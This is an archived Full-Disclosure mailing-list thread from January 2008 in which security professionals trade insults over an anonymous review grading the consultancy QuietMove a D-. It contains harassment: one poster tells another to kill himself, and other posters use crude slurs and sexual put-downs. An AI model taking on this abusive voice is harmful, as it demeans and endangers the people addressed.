From adam.muntner at quietmove.com Tue Jan 1 15:04:48 2008
From: adam.muntner at quietmove.com (Adam Muntner)
Date: Tue, 1 Jan 2008 10:04:48 -0500
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
In-Reply-To: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
Message-ID: <1B24AD54-11D8-44D5-8EB2-2A512C26C365@quietmove.com>

Your review gets a d-.

You can't add. You can't spell. Your skills appear to be limited to rudimentary use of a browser and linkedin.com. In combination with your undeserved and unearned sense of self-importance, pretty pathetic.

You spelled Marcin's last name wrong. Great use of linkedin.com. You can't even cunt n paste. He interned for us last semester. He isn't a front line consultant. So, you fail the ^c ^v and spelling practical, as well as the investigative one. We have 2 other consultants besides myself - they don't use linkedin and you didn't find them. Our clients know our consultants. We don't post their names on the website.

F is for failure.

As for my experience - I was also the security officer for an at-the-time publicly traded company for 2 years, the IT director of 2 .com startups where security was my responsibility for several years, and for the last 2 have been deeply involved with all customer engagements.
Prior to that I spent the 90s architecting, developing, and leading developer teams.
I hsve been pentesting since 98 and nearly nonstop since 2000. You were what, 11 years old then? Clearly, basic arithmetic isn't a strong point of yours, either. I suspect you spent the 90s in grammar school. At least you seemed to learn something there.

On that note....

Most of our clients are referred by others who are very satisfied with the work we perform. Not by the website. It doesn't get a lot of attention - we're small but growing and focused on serving our clients.
I know basic HTML seems like the pinnacle of achievement to you, but we aren't in the business of making pretty web pages. We discuss our methodology with our clients - we don't post it on the web. I know you were hoping to learn something. Hacking for Dummies might be more your speed, after you perfect your Cunt and Paste skills.

I took the plunge and started what is now a growing business nearly 2 years ago, and we now serve 3 Fortune 1000 clients, replacing much larger firms, plus a good number of midsize clients. Being an entrepreneur is a lot more challenging than being an anonymous anklebiter, though from your mom's basement it might not seem that way.

I'm heading to Manhattan for some R&R right now. If you are in the vicinity let me know, I'll buy you a beer (if you're 21) and you can meet me yourself and post a review or something.

Don't take this wrong - consider it constructive criticism and try harder next time. It's good to know we are recognized enough to be noticed by the mighty, anonymous secreview. This might even double our daily web traffic to 20 visitors. ;)

Adam Muntner
Managing Partner
QuietMove, Inc.
http://www.quietmove.com

Sent from my iPhone

On Dec 31, 2007, at 4:13 PM, secreview wrote:

> QuiteMove, located at http://www.quitemove.com is a small Professional IT Security Services Provider that offers Training services, Incident Response Services, Web Application Security Services and Penetration Testing Services. QuiteMove was started by Adam Munter in 2006 along with Jeffrey Rassas, and James Garvey, Jr. You can read their mission statement here "http://www.mywikibiz.com/Directory:QuietMove" (but it's pretty basic).
>
> When reviewing the QuiteMove website and people we were not the least bit impressed. The QuiteMove website is packed full of grammatical errors and many of the services don't even have descriptions. The services that do have descriptions are very poorly written and very poorly defined.
> Take a look at their Penetration Testing service offering as an example. If you want to see an example of no content check out their Social Engineering offering.
>
> Since we were unable to extract anything useful from the materials provided to us by QuiteMove we decided to focus on the talent behind QuietMove. Unfortunately we were equally unimpressed. The only technically oriented team members that we were able to identify within QuietMove were Adam Munter, who is a founder, and Marcin Wielgoszewsk, who is a very "green" consultant. Seeing as Adam Munter is being positioned as the technical visionary for QuietMove, we decided to focus on him and not on Marcin.
>
> Adam's Linkedin Bio: http://tinyurl.com/yt9j2y
>
> As it turns out Adam Munter worked for Accuvant, a company that competes directly with Adam's QuietMove, prior to founding QuietMove. Adam's role at Accuvant was to lead consultants on IT Security Engagements for large organizations. In conjunction with this, Adam also spoke at conferences. He worked here for 1 year and 1 month.
>
> Prior to working for Accuvant, Adam worked for Pegasus Solutions Inc. as the acting Chief Security Officer. Pegasus is the largest hotel reservation distribution system vendor and a major vendor of Hotel Management systems. Adam did get some Sarbanes-Oxley work under his belt as he helped Pegasus to successfully "marshall" through their first audit. Adam also initiated the program to help get Pegasus to be Visa CISP compliant, including evaluating and changing their handling of payment Cardholder data. He worked here for 2 years and 1 month.
>
> From August 2000 to January 2003 Adam was a "Founding member of IBM's Ethical Hacking Center of Competency."
> His responsibilities included being a technical interviewer for new hires, a Penetration Testing Subject Matter Expert, and the performance of consulting engagements for clients ranging from midsize companies and government agencies to the Fortune 500. Adam worked for IBM for 2 years and 6 months.
>
> So if we add up the relevant experience that Adam has had according to his LinkedIn bio we get 1 year and 1 month + 2 years and 6 months, which is a grand total of 3 years and 7 months of professional IT Security Consulting Experience. Not sure about our readers, but to us at Secreview that hardly makes Adam an IT Security Expert.
>
> But wait, now we have a discrepancy...
>
> According to the QuietMove website, Adam "has over 14 years of experience in information security, software, and product R&D with 8 years being dedicated solely to security." His QuietMove bio goes on to say "Adam's particular talents include penetration testing of web and binary applications, networks, systems, and SCADA, 'social engineering' and physical penetration of facilities, and in developing professional services offerings."
>
> This just doesn't add up.
>
> Anyway, remember we didn't set out to bash anyone here, but Adam/QuietMove put himself/themselves in the line of fire. QuietMove appears to be a very small and disorganized shop. Their website is half-assed and incomplete and we can't say anything better about their talent profile. We suggest that QuietMove complete their website and review their talent profile, then we'll set out to do another review and see if they score better. As of right now, we can't give them more than a D-. We'll keep an eye on their website and redo this review if they ever fix their issues.
>
> Score Card (Click to Enlarge)
>
> --
> Posted By secreview to Professional IT Security Providers - Exposed at 12/31/2007 11:32:00 AM
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

From adam.muntner at quietmove.com Tue Jan 1 15:18:14 2008
From: adam.muntner at quietmove.com (Adam Muntner)
Date: Tue, 1 Jan 2008 10:18:14 -0500
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( secreview review: D- )
In-Reply-To: <1B24AD54-11D8-44D5-8EB2-2A512C26C365@quietmove.com>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> <1B24AD54-11D8-44D5-8EB2-2A512C26C365@quietmove.com>
Message-ID: <5506C1BC-5FE2-4C71-BBAB-FF7FFE176591@quietmove.com>

Before secreview jumps on them, apologies for the typos. Hard to type a long email on a touchscreen, on the train!

No hard feelings secreview. I appreciate the review. There is no such thing as bad press, and I had fun writing my witty and clever rejoinder.

Adam Muntner
Managing Partner
QuietMove, Inc.
Phone: 602-793-5969
Fax: 866-272-8194
http://www.quietmove.com

Sent from my iPhone

On Jan 1, 2008, at 10:04 AM, Adam Muntner wrote:

> Your review gets a d-.
> [remainder of the 10:04 AM message, including the quoted secreview post, quoted in full]
From marcinw86 at gmail.com Tue Jan 1 16:57:36 2008
From: marcinw86 at gmail.com (Marcin Wielgoszewski)
Date: Tue, 01 Jan 2008 11:57:36 -0500
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
In-Reply-To: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
Message-ID: <1199206656.15507.12.camel@thinker.ph.cox.net>

Marcin Wielgoszewski here, the "green consultant" you mentioned but chose not to focus on. I'm not sure what you mean by "green," but whatever. I have just finished my bachelor's degree, have done internships with some Fortune 100s and I am constantly doing research on my own. I also make an effort to attend every conference and local meet-up. I have my own blog I started at http://www.tssci-security.com, you can read and learn more about me.

Onto QuietMove and Adam Muntner... QuietMove was founded by Adam and the other two folks you mention. I have done some part-time work with Adam over the past couple months while finishing up my last semester. Adam knows this industry inside-out, and is one of only several people I would say really knows his stuff. I'm sorry the website doesn't have an infosec glossary of terms for you to study for your Security+. I guess looking on LinkedIn and the website passes off as "research" nowadays. Couldn't you have at least used Maltego to look deeper into this? I was actually going to make a post about how pathetic the "research" some people have tried to pass off lately in security, and no one, except for a few, has called anyone out on it.

Some security consulting firms you would give a higher score are some of the firms we've picked up where traceroute, whois and their nmap scanners left off.
From adam.muntner at quietmove.com Tue Jan 1 17:09:39 2008
From: adam.muntner at quietmove.com (Adam Muntner)
Date: Tue, 1 Jan 2008 12:09:39 -0500
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
In-Reply-To: <1199206656.15507.12.camel@thinker.ph.cox.net>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> <1199206656.15507.12.camel@thinker.ph.cox.net>
Message-ID: <15924523-264D-4115-8B10-9A642E87145A@quietmove.com>

Secreview, you might learn something by reading Marcin's blog.

Adam Muntner
Managing Partner
QuietMove, Inc.
Fax: 866-272-8194
http://www.quietmove.com

Sent from my iPhone

On Jan 1, 2008, at 11:57 AM, Marcin Wielgoszewski wrote:

> Marcin Wielgoszewski here, the "green consultant" you mentioned but chose not to focus on.
> [remainder of Marcin's 11:57 AM message quoted in full]
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

From reepex at gmail.com Tue Jan 1 18:12:51 2008
From: reepex at gmail.com (reepex)
Date: Tue, 1 Jan 2008 12:12:51 -0600
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
In-Reply-To: <1B24AD54-11D8-44D5-8EB2-2A512C26C365@quietmove.com>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> <1B24AD54-11D8-44D5-8EB2-2A512C26C365@quietmove.com>
Message-ID:

On Jan 1, 2008 9:04 AM, Adam Muntner wrote:

> I hsve been pentesting since 98 and nearly nonstop since 2000.

You cannot spell either and you have been a 'pentester' ... does this mean you ran nessus and other automated testing tools and call yourself a hacker?

> Sent from my iPhone

Please kill yourself

From silentrunner at hushmail.com Tue Jan 1 18:05:10 2008
From: silentrunner at hushmail.com (SilentRunner)
Date: Tue, 01 Jan 2008 18:05:10 +0000
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
Message-ID: <20080101180510.CB6851A0038@mailserver8.hushmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Adam

I appreciate that you have to defend your firm, but why are you giving the skiddie the satisfaction of even acknowledging his existence? Don't be fooled by the "we", secreview is one person. A kid of maybe 15 sitting in his room looking for something better to do besides squeezing spots and masturbating to the demo dollies on the shopping channel.
Not a single person here has had anything but derision for the fool's efforts, none of which have added or will ever add anything useful to the trade. I look forward to the day when he "reviews" a big firm and they send the lawyers in to hopefully take his parents' (some people shouldn't be allowed to breed) house, and his computer away. If he is universally ignored, he will get bored and go away. Perhaps with luck he will direct his reviewing "talents" to something useful, like hairdressers, or cosmetics, where simply reading a website has some relevance to the product, not.

SR

On Tue, 01 Jan 2008 15:04:48 +0000 Adam Muntner wrote:

>Your review gets a d-.
>[remainder of Adam Muntner's 10:04 AM message, including the quoted secreview post, quoted in full]
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Charset: UTF8
Version: Hush 2.5

wpwEAQECAAYFAkd6gNYACgkQBGNKW24YMAeDsgP/WXrFSFiSws8FjqvKEUIjFa7l/FDf
CZMGF8DLNhJJJE5Wnix95G8+WEV7nWqwv9m20/xRfcDd9S9L3xSiRx5ljZTB5gJEXwxn
PqF9c0wd+lrQsjzuqwwUUbwvJN8nOfna0IQ+ZFElRGb+y++d8sxTty8Vf4G0DcsJycmO
WACPxgE=
=xFU2
-----END PGP SIGNATURE-----

From reepex at gmail.com Tue Jan 1 18:33:36 2008
From: reepex at gmail.com (reepex)
Date: Tue, 1 Jan 2008 12:33:36 -0600
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
In-Reply-To: <1199206656.15507.12.camel@thinker.ph.cox.net>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> <1199206656.15507.12.camel@thinker.ph.cox.net>
Message-ID:

You are worthless.

http://www.tssci-security.com/bookshelf/

Is this list up to date? It makes it seem as if you are learning basic linux commands, sed, and basic perl. Also why are you reading Operating System Design and Implementation when you do not know C? (Seeing as C books are in your 'to-read' list.) Do you understand any of the code in it or do you just pick out buzz words to talk about at your 'local meet-ups'. Why don't you explain the finer points of microkernel design to us?
You are headed even further down the path of complete lamer seeing as you read books on XSS and all your blog posts revolve around it.

even more lulz in your 'plan to read' containing books on fuzzing, metasploit, and writing rootkits. How can you write rootkits when you do not know C and are learning basic unix commands?... lol

Hopefully one day you realize that you are just another security industry kiddie and have no real knowledge, but probably not. Seeing as you have your 'bachelors' ( lol - has nothing to do with security ) - I am sure you are well on your way to a cissp.

Also for a good laugh people should read:

http://www.tssci-security.com/projects/

how long did it take you to write all 40 lines of your 'labs' code? I shall notify perl underground of your horrendous perl and you shall be a source of great lulz in their next production.

Just found this:
http://www.tssci-security.com/blog/wp-content/uploads/2007/11/mwielgoszewski_resume.pdf
So you worked 4 places and did nothing useful. Sounds like Simon may want to hire you. ( Hi simon , are your workers still inadequate and you need more help? )

So basically you have worked 4 jobs, went to a community college that has some sort of security program, you know basic perl and C, do not know how to audit any real programs, and blog about XSS. Does this summarize you pretty well?

On Jan 1, 2008 10:57 AM, Marcin Wielgoszewski wrote:
> Marcin Wielgoszewski here, the "green consultant" you mentioned but chose not to focus on. I'm not sure what you mean by "green," but whatever. I have just finished my bachelor's degree, have done internships with some Fortune-100's and I am constantly doing research on my own. I also make an effort to attend every conference and local meet-up. I have my own blog I started at http://www.tssci-security.com, you can read and learn more about me.
>
> Onto QuietMove and Adam Muntner... QuietMove was founded by Adam and the other two folks you mention.
> I have done some part-time work with Adam over the past couple months while finishing up my last semester. Adam knows this industry inside-out, and one of only several people I would say really knows his stuff. I'm sorry the website doesn't have an infosec glossary of terms for you to study for your Security+. I guess looking on LinkedIn and the website passes off as "research" nowadays. Couldn't you have at least used Maltego to look deeper into this? I was actually going to make a post about how pathetic the "research" some people have tried to pass off lately in security, and no one, except for a few have called anyone out on it.
>
> Some security consulting firms you would give a higher score are some of the firms we've picked up where traceroute, whois and their nmap scanners left off.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

From lasveda at gmail.com Tue Jan 1 18:47:25 2008
From: lasveda at gmail.com (veda)
Date: Tue, 01 Jan 2008 19:47:25 +0100
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
In-Reply-To:
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> <1B24AD54-11D8-44D5-8EB2-2A512C26C365@quietmove.com>
Message-ID: <477A8ABD.7020701@gmail.com>

reepex wrote:
> On Jan 1, 2008 9:04 AM, Adam Muntner wrote:
>> I hsve been pentesting since 98 and nearly nonstop since 2000.
>
> You cannot spell either and you have been a 'pentester' ... does this mean you ran nessus and other automated testing tools and call yourself a hacker?
>
>> Sent from my iPhone
>
> Cares?
>
> Please kill yourself

You all need to grow up a bit, and stfu.

From dentonj at gmail.com Tue Jan 1 19:06:45 2008
From: dentonj at gmail.com (Jeffrey Denton)
Date: Tue, 1 Jan 2008 20:06:45 +0100
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
In-Reply-To:
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> <1199206656.15507.12.camel@thinker.ph.cox.net>
Message-ID: <8ebbd7f50801011106x75245a82m41c21586a6c27984@mail.gmail.com>

On Jan 1, 2008 7:33 PM, reepex wrote:
> http://www.tssci-security.com/bookshelf/
>
> Is this list up to date? It makes it seem as if you are learning basic linux commands, sed, and basic perl. Also why are you reading operating system design and implementation when you do not know C? ( Seeing as C books are in your 'to-read' list ).

The C programming book listed on the bookshelf has been given a "Not Recommended" review by the ACCU.

From marcinw86 at gmail.com Tue Jan 1 19:08:11 2008
From: marcinw86 at gmail.com (Marcin Wielgoszewski)
Date: Tue, 1 Jan 2008 14:08:11 -0500
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
In-Reply-To:
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> <1199206656.15507.12.camel@thinker.ph.cox.net>
Message-ID:

You're right. I'm new and young and I'll be the first to admit it. We can't all be born security gurus, and I'm not trying to hide that, but me aside... what have you done besides hide behind your gmail account and troll FD?

Thanks for pointing out those two pages, two pages out of 100's that were posted a long time ago and yes, are very out of date.

On Jan 1, 2008 1:33 PM, reepex wrote:
> You are worthless.
>
> http://www.tssci-security.com/bookshelf/
>
> Is this list up to date? It makes it seem as if you are learning basic linux commands, sed, and basic perl. Also why are you reading operating system design and implementation when you do not know C?
> ( Seeing as C books are in your 'to-read' list ). Do you understand any of the code in it or do you just pick out buzz words to talk about at your 'local meet-ups'. Why don't you explain the finer points of microkernel design to us?
>
> You are headed even further down the path of complete lamer seeing as you read books on XSS and all your blog posts revolve around it.
>
> even more lulz in your 'plan to read' containing books on fuzzing, metasploit, and writing rootkits. How can you write rootkits when you do not know C and are learning basic unix commands?... lol
>
> Hopefully one day you realize that you are just another security industry kiddie and have no real knowledge, but probably not. Seeing as you have your 'bachelors' ( lol - has nothing to do with security ) - I am sure you are well on your way to a cissp.
>
> Also for a good laugh people should read:
>
> http://www.tssci-security.com/projects/
>
> how long did it take you to write all 40 lines of your 'labs' code? I shall notify perl underground of your horrendous perl and you shall be a source of great lulz in their next production.
>
> Just found this:
> http://www.tssci-security.com/blog/wp-content/uploads/2007/11/mwielgoszewski_resume.pdf
> So you worked 4 places and did nothing useful. Sounds like Simon may want to hire you. ( Hi simon , are your workers still inadequate and you need more help? )
>
> So basically you have worked 4 jobs, went to a community college that has some sort of security program, you know basic perl and C, do not know how to audit any real programs, and blog about XSS. Does this summarize you pretty well?
>

From adam.muntner at quietmove.com Tue Jan 1 19:33:36 2008
From: adam.muntner at quietmove.com (Adam Muntner)
Date: Tue, 1 Jan 2008 14:33:36 -0500
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
In-Reply-To:
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> <1B24AD54-11D8-44D5-8EB2-2A512C26C365@quietmove.com>
Message-ID: <3C02D8EB-28FE-438A-8D15-A0CE343108DB@quietmove.com>

That would be an incorrect assumption. As I mentioned in the followup email - I typed my response on my phone's touchscreen, on a moving train.

D- on your reading comprehension skills.

F on your need to diss, anonymously.

F- on if there is such a thing based on your suggestion of suicide for my choice in cell phone. Save your allowance and maybe you could buy one, too.

I will stand by my words. I sign my name to them. Though, based on the content and quality of your posts, I see why you won't.

Adam Muntner
Managing Partner
QuietMove, Inc.
http://www.quietmove.com

Sent from my iPhone

On Jan 1, 2008, at 1:12 PM, reepex wrote:
> On Jan 1, 2008 9:04 AM, Adam Muntner wrote:
>> I hsve been pentesting since 98 and nearly nonstop since 2000.
>
> You cannot spell either and you have been a 'pentester' ... does this mean you ran nessus and other automated testing tools and call yourself a hacker?
>
>> Sent from my iPhone
>
> Please kill yourself

From reepex at gmail.com Tue Jan 1 19:49:47 2008
From: reepex at gmail.com (reepex)
Date: Tue, 1 Jan 2008 13:49:47 -0600
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
In-Reply-To:
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> <1199206656.15507.12.camel@thinker.ph.cox.net>
Message-ID:

your attitude sure has changed since your last post.
Maybe you shouldn't sound so commanding on a real list next time and instead stick to your local 2600 meetings.

On Jan 1, 2008 1:08 PM, Marcin Wielgoszewski wrote:
> You're right. I'm new and young and I'll be the first to admit it. We can't all be born security gurus, and I'm not trying to hide that, but me aside... what have you done besides hide behind your gmail account and troll FD?
>
> Thanks for pointing out those two pages, two pages out of 100's that were posted a long time ago and yes, are very out of date.
>
> On Jan 1, 2008 1:33 PM, reepex wrote:
>> You are worthless.
>>
>> http://www.tssci-security.com/bookshelf/
>>
>> Is this list up to date? It makes it seem as if you are learning basic linux commands, sed, and basic perl. Also why are you reading operating system design and implementation when you do not know C? ( Seeing as C books are in your 'to-read' list ). Do you understand any of the code in it or do you just pick out buzz words to talk about at your 'local meet-ups'. Why don't you explain the finer points of microkernel design to us?
>>
>> You are headed even further down the path of complete lamer seeing as you read books on XSS and all your blog posts revolve around it.
>>
>> even more lulz in your 'plan to read' containing books on fuzzing, metasploit, and writing rootkits. How can you write rootkits when you do not know C and are learning basic unix commands?... lol
>>
>> Hopefully one day you realize that you are just another security industry kiddie and have no real knowledge, but probably not. Seeing as you have your 'bachelors' ( lol - has nothing to do with security ) - I am sure you are well on your way to a cissp.
>>
>> Also for a good laugh people should read:
>>
>> http://www.tssci-security.com/projects/
>>
>> how long did it take you to write all 40 lines of your 'labs' code?
>> I shall notify perl underground of your horrendous perl and you shall be a source of great lulz in their next production.
>>
>> Just found this:
>> http://www.tssci-security.com/blog/wp-content/uploads/2007/11/mwielgoszewski_resume.pdf
>> So you worked 4 places and did nothing useful. Sounds like Simon may want to hire you. ( Hi simon , are your workers still inadequate and you need more help? )
>>
>> So basically you have worked 4 jobs, went to a community college that has some sort of security program, you know basic perl and C, do not know how to audit any real programs, and blog about XSS. Does this summarize you pretty well?
>

From reepex at gmail.com Tue Jan 1 20:47:06 2008
From: reepex at gmail.com (reepex)
Date: Tue, 1 Jan 2008 14:47:06 -0600
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
In-Reply-To: <3C02D8EB-28FE-438A-8D15-A0CE343108DB@quietmove.com>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> <1B24AD54-11D8-44D5-8EB2-2A512C26C365@quietmove.com> <3C02D8EB-28FE-438A-8D15-A0CE343108DB@quietmove.com>
Message-ID:

So what exactly do you do then? Please explain your skills to us since you conveniently avoided my questions about your metasploit and auto hacking skills.

On Jan 1, 2008 1:33 PM, Adam Muntner wrote:
> That would be an incorrect assumption. As I mentioned in the followup email - I typed my response on my phone's touchscreen, on a moving train.
>
> D- on your reading comprehension skills.
>
> F on your need to diss, anonymously.
>
> F- on if there is such a thing based on your suggestion of suicide for my choice in cell phone. Save your allowance and maybe you could buy one, too.
>
> I will stand by my words. I sign my name to them.
> Though, based on the content and quality of your posts, I see why you won't.
>
> Adam Muntner
> Managing Partner
> QuietMove, Inc.
> http://www.quietmove.com
>
> Sent from my iPhone
>
> On Jan 1, 2008, at 1:12 PM, reepex wrote:
>> On Jan 1, 2008 9:04 AM, Adam Muntner <adam.muntner at quietmove.com> wrote:
>>> I hsve been pentesting since 98 and nearly nonstop since 2000.
>>
>> You cannot spell either and you have been a 'pentester' ... does this mean you ran nessus and other automated testing tools and call yourself a hacker?
>>
>>> Sent from my iPhone
>>
>> Please kill yourself

From andreg at gmail.com Tue Jan 1 03:36:49 2008
From: andreg at gmail.com (Andre Gironda)
Date: Mon, 31 Dec 2007 20:36:49 -0700
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
In-Reply-To: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
Message-ID: <2fd9390e0712311936j4ed56a32tcfca798ea35b5f86@mail.gmail.com>

On Dec 31, 2007 2:13 PM, secreview wrote:
> Not sure about our readers, but to us at Secreview that hardly makes Adam an IT Security Expert.
>
> But wait, now we have a discrepancy...

Pardon me, but who is this? "secreview"? Who is behind this email address? If you don't identify yourself then I assume that this entire thread is some sort of vengeance play.

> According to the QuietMove website, Adam "has over 14 years of experience in information security, software, and product R&D with 8 years being dedicated solely to security."
> His QuietMove bio goes on to say "Adam's particular talents include penetration testing of web and binary applications, networks, systems, and SCADA, "social engineering" and physical penetration of facilities, and in developing professional services offerings."
>
> This just doesn't add up.

I can vouch for Adam's 14 years of experience and then some. When I met Adam in 1992, he already had a strong command of Unix security. He was an administrator (1 of 4 total over 7 years) of Unphamiliar Territories (UPT), a vulnerability research BBS that ran from 1989 - 1996. It was a prominent place for information about vulnerability research. Many held it in higher regard than Phrack magazine or any leading website/magazine during that time period. Sites such as PullThePlug, HackThisSite, etc. all borrowed ideas from UPT, and the code was re-used and made available in Phrack magazine as well as integrated into the Linux kernel or features thereof. UPT was about 5-6 years ahead of the NSA before they released SELinux and 7-8 years ahead of projects such as GRSecurity. Anyone making such an enormous contribution to this sort of project has certainly provided a greater service to our industry than a "secreview"/company-bashing organization such as yourself.

> Anyway, remember we didn't set out to bash anyone here

Well then you should read your email before you hit the "send" button.

> but Adam/QuietMove put himself/themselves in the line of fire. QuietMove appears to be a very small and disorganized shop. Their website is half-assed and incomplete and we can't say anything better about their talent profile. We suggest that QuietMove complete their website and review their talent profile, then we'll set out to do another review and see if they score better. As of right now, we can't give them more than a D-. We'll keep an eye on their website and redo this review if they ever fix their issues.
Many small businesses such as QuietMove have a hard enough time staying alive in this industry. I suggest you "pick on someone your own size" even if you have a legitimate problem with QuietMove or Adam. Compared to the other companies that you mentioned (Accuvant, IBM/ISS, Pegasus), QuietMove will certainly provide a much more friendly service environment for companies to work in. I would put my recommendation of quality on the work QuietMove does as A+. There are few PCI ASVs or penetration testing companies that I would find any value in -- and QuietMove exceeds my expectations in this area.

Cheers,
Andre

From reepex at gmail.com Tue Jan 1 22:11:14 2008
From: reepex at gmail.com (reepex)
Date: Tue, 1 Jan 2008 16:11:14 -0600
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
In-Reply-To: <2fd9390e0712311936j4ed56a32tcfca798ea35b5f86@mail.gmail.com>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> <2fd9390e0712311936j4ed56a32tcfca798ea35b5f86@mail.gmail.com>
Message-ID:

On Dec 31, 2007 9:36 PM, Andre Gironda wrote:
> Sites such as PullThePlug, HackThisSite, etc all borrowed ideas from UPT,

what exactly was borrowed? because I am pretty sure none of the hackthissite founders were around when this magazine was.

> There are few PCI ASV's or penetration testing companies that I would find any value in -- and QuietMove exceeds my expectations in this area.

what are their methods? No one has answered that yet.. I imagine being a small company they must rely on a lot of automated testing due to time/man power restraints
From mdz at prohest.com Wed Jan 2 00:04:42 2008
From: mdz at prohest.com (Martin Zimmermann)
Date: Wed, 02 Jan 2008 01:04:42 +0100
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
In-Reply-To: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com>
Message-ID: <477AD51A.1080401@prohest.com>

Nice try, but....

Adding, spelling and content sucks. Do better research next time.

So that's: 2 tries, 2 fails, 0 passed on your reviews.

/See me after class..

Hugz

secreview wrote:
> QuiteMove, located at http://www.quitemove.com is a small Professional IT Security Services Provider that offers Training services, Incident Response Services, Web Application Security Services and Penetration Testing Services. QuiteMove was started by Adam Munter in 2006 along with Jeffrey Rassas, and James Garvey, Jr. You can read their mission statement here "http://www.mywikibiz.com/Directory:QuietMove" (but its pretty basic).
>
> When reviewing the QuiteMove website and people we were not the least bit impressed. The QuiteMove website is packed full of grammatical errors and many of the services don't even have descriptions. The services that do have descriptions are very poorly written and very poorly defined. Take a look at their Penetration Testing service offering as an example. If you want to see an example of no content check out their Social Engineering offering.
>
> Since we were unable to extract anything useful from the materials provided to us by QuiteMove we decided to focus on the talent behind QuietMove. Unfortunately we were equally unimpressed.
> The only technically oriented team members that we were able to identify within QuietMove were Adam Munter, who is a founder and Marcin Wielgoszewsk, who is a very "green" consultant. Seeing as Adam Munter is being positioned as the technical visionary for QuietMove, we decided to focus on him and not on Marcin.
>
> Adam's Linkedin Bio: http://tinyurl.com/yt9j2y
>
> As it turns out Adam Munter worked for Accuvant, a company that competes directly with Adam's QuietMove; prior to founding QuietMove. Adam's role at Accuvant was to lead consultants on IT Security Engagements for large organizations. In conjunction with this, Adam also spoke at conferences. He worked here for 1 year and 1 month.
>
> Prior to working for Accuvant, Adam worked for Pegasus Solutions Inc. as the acting Chief Security Officer. Pegasus is the largest hotel reservation distribution system vendor and a major vendor of Hotel Management systems. Adam did get some Sarbanes Oxley work under his belt as he helped Pegasus to successfully "marshall" through their first audit. Adam also initiated the program to help get Pegasus to be Visa CISP compliant, including evaluating and changing their handling of payment Cardholder data. He worked here for 2 years and 1 month.
>
> From August 2000 to January 2003 Adam was a "Founding member of IBM's Ethical Hacking Center of Competency." His responsibilities included being a technical interviewer for new hires, a Penetration Testing Subject Matter Expert, and the performance of consulting engagements for clients ranging from midsize companies and government agencies to the fortune 500. Adam worked for IBM for 2 years and 6 months.
>
> So if we add up the relevant experience that Adam has had according to his linked in bio we get 1 year and 1 month + 2 years and 6 months, which is a grand total of 3 years and 7 months of professional IT Security Consulting Experience.
> Not sure about our readers, but to us at Secreview that hardly makes Adam an IT Security Expert.
>
> But wait, now we have a discrepancy...
>
> According to the QuietMove website, Adam "has over 14 years of experience in information security, software, and product R&D with 8 years being dedicated solely to security." His QuietMove bio goes on to say "Adam's particular talents include penetration testing of web and binary applications, networks, systems, and SCADA, 'social engineering' and physical penetration of facilities, and in developing professional services offerings."
>
> This just doesn't add up.
>
> Anyway, remember we didn't set out to bash anyone here, but Adam/QuietMove put himself/themselves in the line of fire. QuietMove appears to be a very small and disorganized shop. Their website is half-assed and incomplete and we can't say anything better about their talent profile. We suggest that QuietMove complete their website and review their talent profile, then we'll set out to do another review and see if they score better. As of right now, we can't give them more than a D-. We'll keep an eye on their website and redo this review if they ever fix their issues.
>
> Score Card (Click to Enlarge)
>
> --
> Posted By secreview to Professional IT Security Providers - Exposed at 12/31/2007 11:32:00 AM
> ------------------------------------------------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
